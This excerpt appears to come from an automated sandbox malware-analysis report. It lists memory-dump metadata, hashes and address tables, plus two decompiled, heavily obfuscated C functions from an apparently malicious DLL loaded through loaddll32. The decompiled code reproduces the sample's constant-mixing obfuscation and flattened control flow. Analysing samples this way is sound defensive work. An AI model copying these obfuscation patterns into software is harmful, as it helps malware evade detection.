                                                                                                          0x00000000
                                                                                                          0x02b0060f
                                                                                                          0x02b004da
                                                                                                          0x02b004dc
                                                                                                          0x02b005db
                                                                                                          0x02b005db
                                                                                                          0x02b005e1
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02b0061c
                                                                                                          0x02b0061c
                                                                                                          0x02b0061c
                                                                                                          0x02b004f9
                                                                                                          0x02b00518
                                                                                                          0x02b00533
                                                                                                          0x02b00538
                                                                                                          0x02b00544
                                                                                                          0x02b0054b
                                                                                                          0x02b0058e
                                                                                                          0x02b005ae
                                                                                                          0x02b005b7
                                                                                                          0x02b005c6
                                                                                                          0x02b005cb
                                                                                                          0x02b005d0
                                                                                                          0x02b005d2
                                                                                                          0x00000000
                                                                                                          0x02b005d2
                                                                                                          0x00000000
                                                                                                          0x02b005d0
                                                                                                          0x02b005d9
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $P$+XJ$XW$_!1
                                                                                                          • API String ID: 0-3524045022
                                                                                                          • Opcode ID: fa625c808638119dfa1d928792569642844b81508bdaf566ae4af049d462cceb
                                                                                                          • Instruction ID: c4683f024ea095494fa40e539ddd742d542b59293e256d9771635cdc604e1add
                                                                                                          • Opcode Fuzzy Hash: fa625c808638119dfa1d928792569642844b81508bdaf566ae4af049d462cceb
                                                                                                          • Instruction Fuzzy Hash: CCD101715093809FD368CF61C98AA5BBBF2FBC4748F108E1DF59A96260D7B59908CF42
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AE80C0, Relevance: 5.3, Strings: 4, Instructions: 261COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 74%
                                                                                                          			E02AE80C0(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				unsigned int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				unsigned int _v168;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				unsigned int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				void* _t254;
				void* _t262;
				intOrPtr _t274;
				intOrPtr _t275;
				intOrPtr* _t276;
				void* _t301;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				intOrPtr _t314;
				void* _t315;
				intOrPtr _t318;
				signed int* _t319;

				_t276 = __ecx;
				_t319 =  &_v224;
				_v180 = 0xc71c90;
				_v180 = _v180 * 0x55;
				_t315 = 0xb85ea37;
				_v180 = _v180 + 0xffff2ba7;
				_v180 = _v180 ^ 0x4211e203;
				_v140 = 0x3ad325;
				_v140 = _v140 ^ 0x295262d9;
				_v140 = _v140 ^ 0x29635001;
				_v136 = 0xed3dcc;
				_t307 = 0x6e;
				_v172 = __ecx;
				_v136 = _v136 * 0x41;
				_v136 = _v136 ^ 0x3c3e3c90;
				_v168 = 0x802272;
				_v168 = _v168 + 0x3a4b;
				_v168 = _v168 >> 4;
				_v168 = _v168 ^ 0x0009cc0d;
				_v144 = 0x950525;
				_v144 = _v144 >> 0xb;
				_v144 = _v144 ^ 0x0000417f;
				_v132 = 0xde9c46;
				_v132 = _v132 | 0x6a28fd38;
				_v132 = _v132 ^ 0x6afd2d29;
				_v152 = 0x89fdc2;
				_v152 = _v152 + 0xffff27d1;
				_v152 = _v152 / _t307;
				_v152 = _v152 ^ 0x00002723;
				_v208 = 0xb8ba68;
				_t308 = 0x59;
				_v208 = _v208 / _t308;
				_v208 = _v208 | 0x82dd863f;
				_t309 = 0x24;
				_v208 = _v208 / _t309;
				_v208 = _v208 ^ 0x03ab2b52;
				_v200 = 0x881ce0;
				_t310 = 0x22;
				_v200 = _v200 / _t310;
				_v200 = _v200 >> 6;
				_v200 = _v200 + 0x7e14;
				_v200 = _v200 ^ 0x000ee7c7;
				_v216 = 0xe9a9fc;
				_v216 = _v216 >> 0xa;
				_v216 = _v216 * 0x7c;
				_v216 = _v216 >> 3;
				_v216 = _v216 ^ 0x000159fc;
				_v148 = 0xc6b5e0;
				_v148 = _v148 >> 8;
				_v148 = _v148 ^ 0x0008baff;
				_v192 = 0x70df9a;
				_v192 = _v192 | 0xc7ad4485;
				_v192 = _v192 << 0xe;
				_v192 = _v192 * 0x6c;
				_v192 = _v192 ^ 0x95ca127f;
				_v164 = 0x9f9928;
				_v164 = _v164 + 0x9182;
				_v164 = _v164 | 0x4431d27d;
				_v164 = _v164 ^ 0x44b31704;
				_v156 = 0x8a7155;
				_v156 = _v156 ^ 0x4b85dc4d;
				_v156 = _v156 << 3;
				_v156 = _v156 ^ 0x587c4d22;
				_v184 = 0xc4c18b;
				_v184 = _v184 ^ 0x011789e6;
				_v184 = _v184 | 0x4a7cbaeb;
				_v184 = _v184 ^ 0x4bf1fe8b;
				_v160 = 0x793715;
				_v160 = _v160 | 0xbf52a4ae;
				_v160 = _v160 ^ 0x0f7ea677;
				_v160 = _v160 ^ 0xb008de62;
				_v212 = 0x3fdf0f;
				_v212 = _v212 + 0xffffd1fd;
				_t311 = 7;
				_t318 = _v172;
				_v212 = _v212 * 0x1c;
				_v212 = _v212 >> 5;
				_v212 = _v212 ^ 0x0033b954;
				_v220 = 0x4e6c7b;
				_v220 = _v220 >> 4;
				_t275 = _v172;
				_v220 = _v220 / _t311;
				_v220 = _v220 + 0x72d0;
				_v220 = _v220 ^ 0x000bd6ae;
				_v176 = 0xb64387;
				_v176 = _v176 + 0xffff3763;
				_v176 = _v176 >> 0x10;
				_v176 = _v176 ^ 0x000cc814;
				_v224 = 0xc05028;
				_v224 = _v224 + 0xffff6137;
				_v224 = _v224 >> 1;
				_v224 = _v224 ^ 0x7bfc229c;
				_v224 = _v224 ^ 0x7ba9fc4e;
				_v188 = 0xb7ebf2;
				_v188 = _v188 >> 9;
				_v188 = _v188 ^ 0x513bd66b;
				_t312 = 0x35;
				_v188 = _v188 * 0x6b;
				_v188 = _v188 ^ 0xf3ed84ff;
				_v196 = 0x918e67;
				_v196 = _v196 >> 0xb;
				_v196 = _v196 / _t312;
				_t313 = 0x12;
				_t314 = _v172;
				_v196 = _v196 / _t313;
				_v196 = _v196 ^ 0x000cd5f1;
				_v204 = 0xbd465b;
				_v204 = _v204 ^ 0x40a0ad4b;
				_v204 = _v204 * 0x5a;
				_v204 = _v204 >> 6;
				_v204 = _v204 ^ 0x022df88e;
				while(1) {
					L1:
					_t254 = 0x58c5d57;
					do {
						while(_t315 != 0x26b32e) {
							if(_t315 == _t254) {
								_push(_v160);
								_push(_v184);
								_push(_v156);
								_t262 = E02AFE1F8(0x2ae1738, _v164, __eflags);
								_push(_t314);
								_push( &_v128);
								_push(_t262);
								_push(_t318);
								_push(_t275);
								 *((intOrPtr*)(E02B031AA(0xb00b1257, 0x44)))();
								E02AFFECB(_t262, _v212, _v220, _v176, _v224);
								_t319 =  &(_t319[0xb]);
								_t315 = 0x5b11858;
								goto L12;
							} else {
								if(_t315 == 0x5b11858) {
									E02B02B09(_v188, _t314, _v196, _v204);
								} else {
									if(_t315 == 0xa9c05ca) {
										_t314 = E02B00A64( *((intOrPtr*)(_t276 + 4)),  *_t276, _v152, _v208);
										__eflags = _t314;
										if(__eflags != 0) {
											_t315 = 0xed0de4e;
											L12:
											_t276 = _v172;
											goto L1;
										}
									} else {
										if(_t315 == 0xb85ea37) {
											_t315 = 0x26b32e;
											continue;
										} else {
											if(_t315 != 0xed0de4e) {
												goto L15;
											} else {
												_t318 = 0x4000;
												_push(_t276);
												_push(_t276);
												_t274 = E02AEC5D8(0x4000);
												_t276 = _v172;
												_t275 = _t274;
												_t319 =  &(_t319[3]);
												_t254 = 0x58c5d57;
												_t315 =  !=  ? 0x58c5d57 : 0x5b11858;
												continue;
											}
										}
									}
								}
							}
							L18:
							return _t275;
						}
						_push(_t276);
						_push(_t276);
						_t318 = E02AFCCA0(1, 0x10);
						_push( &_v128);
						_push(_t318);
						_push(_v132);
						_t301 = 0xb;
						E02AEE404(_v144, _t301);
						_t276 = _v172;
						_t319 =  &(_t319[7]);
						_t315 = 0xa9c05ca;
						_t254 = 0x58c5d57;
						L15:
						__eflags = _t315 - 0x7f64d40;
					} while (__eflags != 0);
					goto L18;
				}
			}













































                                                                                                          0x02ae80c0
                                                                                                          0x02ae80c0
                                                                                                          0x02ae80c6
                                                                                                          0x02ae80d9
                                                                                                          0x02ae80dd
                                                                                                          0x02ae80e2
                                                                                                          0x02ae80ea
                                                                                                          0x02ae80f2
                                                                                                          0x02ae80fa
                                                                                                          0x02ae8102
                                                                                                          0x02ae810a
                                                                                                          0x02ae8119
                                                                                                          0x02ae811c
                                                                                                          0x02ae8120
                                                                                                          0x02ae8124
                                                                                                          0x02ae812c
                                                                                                          0x02ae8134
                                                                                                          0x02ae813c
                                                                                                          0x02ae8141
                                                                                                          0x02ae8149
                                                                                                          0x02ae8151
                                                                                                          0x02ae8156
                                                                                                          0x02ae815e
                                                                                                          0x02ae8166
                                                                                                          0x02ae816e
                                                                                                          0x02ae8176
                                                                                                          0x02ae817e
                                                                                                          0x02ae818e
                                                                                                          0x02ae8192
                                                                                                          0x02ae819a
                                                                                                          0x02ae81a6
                                                                                                          0x02ae81ab
                                                                                                          0x02ae81b1
                                                                                                          0x02ae81bd
                                                                                                          0x02ae81c2
                                                                                                          0x02ae81c8
                                                                                                          0x02ae81d0
                                                                                                          0x02ae81dc
                                                                                                          0x02ae81df
                                                                                                          0x02ae81e3
                                                                                                          0x02ae81e8
                                                                                                          0x02ae81f0
                                                                                                          0x02ae81f8
                                                                                                          0x02ae8200
                                                                                                          0x02ae820a
                                                                                                          0x02ae820e
                                                                                                          0x02ae8213
                                                                                                          0x02ae821b
                                                                                                          0x02ae8223
                                                                                                          0x02ae8228
                                                                                                          0x02ae8230
                                                                                                          0x02ae8238
                                                                                                          0x02ae8240
                                                                                                          0x02ae824a
                                                                                                          0x02ae824e
                                                                                                          0x02ae8256
                                                                                                          0x02ae825e
                                                                                                          0x02ae8266
                                                                                                          0x02ae826e
                                                                                                          0x02ae8276
                                                                                                          0x02ae8280
                                                                                                          0x02ae8288
                                                                                                          0x02ae828d
                                                                                                          0x02ae8295
                                                                                                          0x02ae829d
                                                                                                          0x02ae82a5
                                                                                                          0x02ae82ad
                                                                                                          0x02ae82b5
                                                                                                          0x02ae82bd
                                                                                                          0x02ae82c5
                                                                                                          0x02ae82cd
                                                                                                          0x02ae82d5
                                                                                                          0x02ae82dd
                                                                                                          0x02ae82ec
                                                                                                          0x02ae82ef
                                                                                                          0x02ae82f3
                                                                                                          0x02ae82f7
                                                                                                          0x02ae82fc
                                                                                                          0x02ae8304
                                                                                                          0x02ae830c
                                                                                                          0x02ae8319
                                                                                                          0x02ae831d
                                                                                                          0x02ae8321
                                                                                                          0x02ae8329
                                                                                                          0x02ae8331
                                                                                                          0x02ae8339
                                                                                                          0x02ae8341
                                                                                                          0x02ae8346
                                                                                                          0x02ae834e
                                                                                                          0x02ae8356
                                                                                                          0x02ae835e
                                                                                                          0x02ae8362
                                                                                                          0x02ae836a
                                                                                                          0x02ae8372
                                                                                                          0x02ae837a
                                                                                                          0x02ae837f
                                                                                                          0x02ae838c
                                                                                                          0x02ae838f
                                                                                                          0x02ae8393
                                                                                                          0x02ae839b
                                                                                                          0x02ae83a3
                                                                                                          0x02ae83b0
                                                                                                          0x02ae83b8
                                                                                                          0x02ae83bb
                                                                                                          0x02ae83bf
                                                                                                          0x02ae83c3
                                                                                                          0x02ae83cb
                                                                                                          0x02ae83d3
                                                                                                          0x02ae83e0
                                                                                                          0x02ae83e4
                                                                                                          0x02ae83e9
                                                                                                          0x02ae83f1
                                                                                                          0x02ae83f1
                                                                                                          0x02ae83f1
                                                                                                          0x02ae83f6
                                                                                                          0x02ae83f6
                                                                                                          0x02ae8404
                                                                                                          0x02ae849c
                                                                                                          0x02ae84a5
                                                                                                          0x02ae84a9
                                                                                                          0x02ae84b1
                                                                                                          0x02ae84c4
                                                                                                          0x02ae84c5
                                                                                                          0x02ae84c6
                                                                                                          0x02ae84c7
                                                                                                          0x02ae84c8
                                                                                                          0x02ae84d1
                                                                                                          0x02ae84e5
                                                                                                          0x02ae84ea
                                                                                                          0x02ae84ed
                                                                                                          0x00000000
                                                                                                          0x02ae840a
                                                                                                          0x02ae8410
                                                                                                          0x02ae855a
                                                                                                          0x02ae8416
                                                                                                          0x02ae841c
                                                                                                          0x02ae8482
                                                                                                          0x02ae8486
                                                                                                          0x02ae8488
                                                                                                          0x02ae848e
                                                                                                          0x02ae8493
                                                                                                          0x02ae8493
                                                                                                          0x00000000
                                                                                                          0x02ae8493
                                                                                                          0x02ae841e
                                                                                                          0x02ae8424
                                                                                                          0x02ae8469
                                                                                                          0x00000000
                                                                                                          0x02ae8426
                                                                                                          0x02ae842c
                                                                                                          0x00000000
                                                                                                          0x02ae8432
                                                                                                          0x02ae8436
                                                                                                          0x02ae8447
                                                                                                          0x02ae8448
                                                                                                          0x02ae844a
                                                                                                          0x02ae844f
                                                                                                          0x02ae8453
                                                                                                          0x02ae8455
                                                                                                          0x02ae845f
                                                                                                          0x02ae8464
                                                                                                          0x00000000
                                                                                                          0x02ae8464
                                                                                                          0x02ae842c
                                                                                                          0x02ae8424
                                                                                                          0x02ae841c
                                                                                                          0x02ae8410
                                                                                                          0x02ae8564
                                                                                                          0x02ae856d
                                                                                                          0x02ae856d
                                                                                                          0x02ae8504
                                                                                                          0x02ae8505
                                                                                                          0x02ae850f
                                                                                                          0x02ae8518
                                                                                                          0x02ae8519
                                                                                                          0x02ae851a
                                                                                                          0x02ae8527
                                                                                                          0x02ae8528
                                                                                                          0x02ae852d
                                                                                                          0x02ae8531
                                                                                                          0x02ae8534
                                                                                                          0x02ae8539
                                                                                                          0x02ae853e
                                                                                                          0x02ae853e
                                                                                                          0x02ae853e
                                                                                                          0x00000000
                                                                                                          0x02ae854a

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: "M|X$#'$K:${lN
                                                                                                          • API String ID: 0-1886388755
                                                                                                          • Opcode ID: 7096ec3574f343029c4ee9e1511327ca7c3f28f292b94d0013d1fd6dc5fe92f7
                                                                                                          • Instruction ID: 43aed699faad2d3819c74fce54fc67ce90f0658b53b1931a71910524b9386ca4
                                                                                                          • Opcode Fuzzy Hash: 7096ec3574f343029c4ee9e1511327ca7c3f28f292b94d0013d1fd6dc5fe92f7
                                                                                                          • Instruction Fuzzy Hash: 6EC151725083809FC758CF2AC58A90BFBE1FBD4758F10891DFA9696260D7B4D94ACF42
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AE4BFC, Relevance: 5.2, Strings: 4, Instructions: 245COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 96%
                                                                                                          			E02AE4BFC(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				unsigned int _v108;
				unsigned int _v112;
				intOrPtr* _t246;
				signed int _t258;
				intOrPtr _t259;
				intOrPtr _t260;
				signed int _t262;
				intOrPtr _t266;
				intOrPtr _t267;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				intOrPtr _t297;
				void* _t299;
				signed int _t300;
				intOrPtr _t301;
				intOrPtr _t302;
				unsigned int* _t303;
				unsigned int* _t304;

				_t260 = __ecx;
				_t303 =  &_v112;
				_v8 = __edx;
				_v24 = __ecx;
				_v28 = 0xe57752;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 ^ 0x00000395;
				_v84 = 0xa7b43c;
				_v84 = _v84 << 0xc;
				_t299 = 0x791519f;
				_v20 = _v20 & 0x00000000;
				_t291 = 0x69;
				_v84 = _v84 / _t291;
				_v84 = _v84 ^ 0x0126ef50;
				_v64 = 0x5471f4;
				_v64 = _v64 << 0xf;
				_v64 = _v64 ^ 0x38ff966c;
				_v108 = 0xe1a857;
				_v108 = _v108 >> 7;
				_v108 = _v108 << 0xf;
				_v108 = _v108 >> 0xf;
				_v108 = _v108 ^ 0x000c4d53;
				_v112 = 0xe3e3b6;
				_t292 = 0x1c;
				_t258 = 0x3d;
				_v112 = _v112 * 0x7f;
				_v112 = _v112 ^ 0x4177f445;
				_v112 = _v112 >> 8;
				_v112 = _v112 ^ 0x003f3c7e;
				_v60 = 0xdb6601;
				_v60 = _v60 | 0x1a9202c7;
				_v60 = _v60 ^ 0x1ad2035c;
				_v104 = 0x132994;
				_v104 = _v104 / _t292;
				_v104 = _v104 + 0x3dcb;
				_v104 = _v104 | 0x8aefcc47;
				_v104 = _v104 ^ 0x8ae713b1;
				_v80 = 0x4c94ef;
				_v80 = _v80 / _t258;
				_v80 = _v80 + 0xffffb573;
				_v80 = _v80 ^ 0x000791ec;
				_v48 = 0x6ce617;
				_v48 = _v48 ^ 0x91a29be4;
				_v48 = _v48 ^ 0x91c139dc;
				_v52 = 0x59f0b3;
				_v52 = _v52 ^ 0x18747c17;
				_v52 = _v52 ^ 0x182d8be2;
				_v56 = 0x3df981;
				_v56 = _v56 << 8;
				_v56 = _v56 ^ 0x3dfc4daf;
				_v76 = 0x62b80;
				_t293 = 0x5d;
				_v76 = _v76 / _t293;
				_v76 = _v76 + 0xffffe926;
				_v76 = _v76 ^ 0xfff7137f;
				_v72 = 0x7226d;
				_v72 = _v72 >> 1;
				_v72 = _v72 + 0x788a;
				_v72 = _v72 ^ 0x000e590c;
				_v96 = 0x39de81;
				_v96 = _v96 + 0x1ccc;
				_v96 = _v96 ^ 0xfb454dc1;
				_v96 = _v96 ^ 0xf28cd76a;
				_v96 = _v96 ^ 0x09fed289;
				_v100 = 0xca2105;
				_v100 = _v100 | 0x676862be;
				_v100 = _v100 + 0xffff68c4;
				_v100 = _v100 << 6;
				_v100 = _v100 ^ 0xfa784873;
				_v40 = 0xc4a147;
				_v40 = _v40 ^ 0x45259758;
				_v40 = _v40 ^ 0x45e701de;
				_v44 = 0x2d23a0;
				_t294 = 0x11;
				_t302 = _v8;
				_v44 = _v44 * 0x52;
				_v44 = _v44 ^ 0x0e7a51ec;
				_v92 = 0x79a225;
				_v92 = _v92 / _t294;
				_v92 = _v92 >> 9;
				_v92 = _v92 | 0x8583c695;
				_v92 = _v92 ^ 0x858adeed;
				_v88 = 0xed07fb;
				_v88 = _v88 + 0x2638;
				_t295 = 0x61;
				_v88 = _v88 / _t295;
				_t296 = 0xa;
				_t297 = _v4;
				_v88 = _v88 / _t296;
				_v88 = _v88 ^ 0x000a4d02;
				_v32 = 0x581804;
				_v32 = _v32 << 2;
				_v32 = _v32 ^ 0x01684d46;
				_v68 = 0xe8e83;
				_v68 = _v68 | 0xc7c33aae;
				_t259 = _v8;
				_v68 = _v68 / _t258;
				_v68 = _v68 ^ 0x0347a863;
				_t240 = _v36;
				L1:
				while(1) {
					do {
						while(_t299 != 0x16cba6e) {
							if(_t299 == 0x286464d) {
								_t297 = 0x10000;
								_push(_t260);
								_push(_t260);
								_t240 = E02AEC5D8(0x10000);
								_t259 = _t240;
								_t303 =  &(_t303[3]);
								if(_t259 != 0) {
									_v36 = _t240;
									_t302 = 0x10000;
									L7:
									_t260 = _v24;
									_t299 = 0x16cba6e;
									continue;
								}
							} else {
								if(_t299 != 0x791519f) {
									goto L15;
								} else {
									_t299 = 0x286464d;
									continue;
								}
							}
							goto L16;
						}
						_t262 = E02AF9C65(_v60,  &_v16, _t240, _t260, _t302, _v104, _v80);
						_t303 =  &(_t303[5]);
						_v20 = _t262;
						if(_t262 == 0) {
							L14:
							_t260 = _v24;
							_t299 = 0xcecd29d;
							goto L15;
						} else {
							_t266 = _v16;
							if(_t266 == 0) {
								goto L14;
							} else {
								_t240 = _v36 + _t266;
								_v36 = _v36 + _t266;
								_t302 = _t302 - _t266;
								if(_t302 != 0) {
									goto L7;
								} else {
									_t267 = _t297 + _t297;
									_push(_t267);
									_push(_t267);
									_v12 = _t267;
									_t301 = E02AEC5D8(_t267);
									_t304 =  &(_t303[3]);
									if(_t301 != 0) {
										E02AFC9B0(_v72, _t301, _v96, _t297, _t259, _v100);
										E02B02B09(_v40, _t259, _v44, _v92);
										_t302 = _t297;
										_t240 = _t301 + _t297;
										_t297 = _v12;
										_t303 =  &(_t304[6]);
										_v36 = _t240;
										_t259 = _t301;
										if(_t302 != 0) {
											goto L7;
										}
									}
								}
							}
						}
						break;
						L15:
						_t240 = _v36;
					} while (_t299 != 0xcecd29d);
					L16:
					_t300 = _v20;
					if(_t300 != 0) {
						_t246 = _v8;
						 *_t246 = _t259;
						 *((intOrPtr*)(_t246 + 4)) = _t297 - _t302;
					} else {
						E02B02B09(_v88, _t259, _v32, _v68);
					}
					return _t300;
				}
			}



















































                                                                                                          0x02ae4bfc
                                                                                                          0x02ae4bfc
                                                                                                          0x02ae4c03
                                                                                                          0x02ae4c07
                                                                                                          0x02ae4c0b
                                                                                                          0x02ae4c13
                                                                                                          0x02ae4c18
                                                                                                          0x02ae4c20
                                                                                                          0x02ae4c28
                                                                                                          0x02ae4c31
                                                                                                          0x02ae4c3a
                                                                                                          0x02ae4c3f
                                                                                                          0x02ae4c44
                                                                                                          0x02ae4c4a
                                                                                                          0x02ae4c52
                                                                                                          0x02ae4c5a
                                                                                                          0x02ae4c5f
                                                                                                          0x02ae4c67
                                                                                                          0x02ae4c6f
                                                                                                          0x02ae4c74
                                                                                                          0x02ae4c79
                                                                                                          0x02ae4c7e
                                                                                                          0x02ae4c86
                                                                                                          0x02ae4c93
                                                                                                          0x02ae4c96
                                                                                                          0x02ae4c99
                                                                                                          0x02ae4c9d
                                                                                                          0x02ae4ca5
                                                                                                          0x02ae4caa
                                                                                                          0x02ae4cb2
                                                                                                          0x02ae4cba
                                                                                                          0x02ae4cc2
                                                                                                          0x02ae4cca
                                                                                                          0x02ae4cda
                                                                                                          0x02ae4cde
                                                                                                          0x02ae4ce6
                                                                                                          0x02ae4cee
                                                                                                          0x02ae4cf6
                                                                                                          0x02ae4d06
                                                                                                          0x02ae4d0a
                                                                                                          0x02ae4d12
                                                                                                          0x02ae4d1a
                                                                                                          0x02ae4d22
                                                                                                          0x02ae4d2a
                                                                                                          0x02ae4d32
                                                                                                          0x02ae4d3a
                                                                                                          0x02ae4d42
                                                                                                          0x02ae4d4a
                                                                                                          0x02ae4d52
                                                                                                          0x02ae4d57
                                                                                                          0x02ae4d5f
                                                                                                          0x02ae4d6b
                                                                                                          0x02ae4d6e
                                                                                                          0x02ae4d72
                                                                                                          0x02ae4d7a
                                                                                                          0x02ae4d82
                                                                                                          0x02ae4d8a
                                                                                                          0x02ae4d8e
                                                                                                          0x02ae4d96
                                                                                                          0x02ae4d9e
                                                                                                          0x02ae4da6
                                                                                                          0x02ae4dae
                                                                                                          0x02ae4db6
                                                                                                          0x02ae4dc0
                                                                                                          0x02ae4dc8
                                                                                                          0x02ae4dd0
                                                                                                          0x02ae4dd8
                                                                                                          0x02ae4de0
                                                                                                          0x02ae4de5
                                                                                                          0x02ae4ded
                                                                                                          0x02ae4df5
                                                                                                          0x02ae4dfd
                                                                                                          0x02ae4e05
                                                                                                          0x02ae4e14
                                                                                                          0x02ae4e17
                                                                                                          0x02ae4e1b
                                                                                                          0x02ae4e1f
                                                                                                          0x02ae4e27
                                                                                                          0x02ae4e37
                                                                                                          0x02ae4e3b
                                                                                                          0x02ae4e40
                                                                                                          0x02ae4e48
                                                                                                          0x02ae4e50
                                                                                                          0x02ae4e58
                                                                                                          0x02ae4e64
                                                                                                          0x02ae4e69
                                                                                                          0x02ae4e73
                                                                                                          0x02ae4e78
                                                                                                          0x02ae4e7c
                                                                                                          0x02ae4e80
                                                                                                          0x02ae4e88
                                                                                                          0x02ae4e90
                                                                                                          0x02ae4e95
                                                                                                          0x02ae4e9d
                                                                                                          0x02ae4ea5
                                                                                                          0x02ae4eb3
                                                                                                          0x02ae4eb7
                                                                                                          0x02ae4ebb
                                                                                                          0x02ae4ec3
                                                                                                          0x00000000
                                                                                                          0x02ae4ec7
                                                                                                          0x02ae4ec7
                                                                                                          0x02ae4ec7
                                                                                                          0x02ae4ed5
                                                                                                          0x02ae4eee
                                                                                                          0x02ae4eff
                                                                                                          0x02ae4f00
                                                                                                          0x02ae4f02
                                                                                                          0x02ae4f07
                                                                                                          0x02ae4f09
                                                                                                          0x02ae4f0e
                                                                                                          0x02ae4f14
                                                                                                          0x02ae4f18
                                                                                                          0x02ae4f1a
                                                                                                          0x02ae4f1a
                                                                                                          0x02ae4f1e
                                                                                                          0x00000000
                                                                                                          0x02ae4f1e
                                                                                                          0x02ae4ed7
                                                                                                          0x02ae4edd
                                                                                                          0x00000000
                                                                                                          0x02ae4ee3
                                                                                                          0x02ae4ee3
                                                                                                          0x00000000
                                                                                                          0x02ae4ee3
                                                                                                          0x02ae4edd
                                                                                                          0x00000000
                                                                                                          0x02ae4ed5
                                                                                                          0x02ae4f3d
                                                                                                          0x02ae4f3f
                                                                                                          0x02ae4f42
                                                                                                          0x02ae4f48
                                                                                                          0x02ae4fd5
                                                                                                          0x02ae4fd5
                                                                                                          0x02ae4fd9
                                                                                                          0x00000000
                                                                                                          0x02ae4f4e
                                                                                                          0x02ae4f4e
                                                                                                          0x02ae4f54
                                                                                                          0x00000000
                                                                                                          0x02ae4f56
                                                                                                          0x02ae4f5a
                                                                                                          0x02ae4f5c
                                                                                                          0x02ae4f60
                                                                                                          0x02ae4f62
                                                                                                          0x00000000
                                                                                                          0x02ae4f64
                                                                                                          0x02ae4f68
                                                                                                          0x02ae4f77
                                                                                                          0x02ae4f78
                                                                                                          0x02ae4f7a
                                                                                                          0x02ae4f86
                                                                                                          0x02ae4f88
                                                                                                          0x02ae4f8d
                                                                                                          0x02ae4f9f
                                                                                                          0x02ae4fb2
                                                                                                          0x02ae4fb7
                                                                                                          0x02ae4fb9
                                                                                                          0x02ae4fbc
                                                                                                          0x02ae4fc3
                                                                                                          0x02ae4fc6
                                                                                                          0x02ae4fca
                                                                                                          0x02ae4fce
                                                                                                          0x00000000
                                                                                                          0x02ae4fd0
                                                                                                          0x02ae4fce
                                                                                                          0x02ae4f8d
                                                                                                          0x02ae4f62
                                                                                                          0x02ae4f54
                                                                                                          0x00000000
                                                                                                          0x02ae4fde
                                                                                                          0x02ae4fde
                                                                                                          0x02ae4fe2
                                                                                                          0x02ae4fee
                                                                                                          0x02ae4fee
                                                                                                          0x02ae4ff4
                                                                                                          0x02ae5011
                                                                                                          0x02ae5017
                                                                                                          0x02ae5019
                                                                                                          0x02ae4ff6
                                                                                                          0x02ae5004
                                                                                                          0x02ae500e
                                                                                                          0x02ae5025
                                                                                                          0x02ae5025

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 8&$Rw$~<?$~<?
                                                                                                          • API String ID: 0-2119221410
                                                                                                          • Opcode ID: 8600c1e993c0d45627bb2cec288f3db7b3b12e0d783027c3838aca3f29b87caf
                                                                                                          • Instruction ID: d15f4bf308c779bb583cd7b87bc7497adf6ba52fde3a012c24b8d740b7d4622f
                                                                                                          • Opcode Fuzzy Hash: 8600c1e993c0d45627bb2cec288f3db7b3b12e0d783027c3838aca3f29b87caf
                                                                                                          • Instruction Fuzzy Hash: 42B120716083419FC758CF69C48990BFBE1BBC8B58F50891EF9A697220D7B4D94ACF42
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

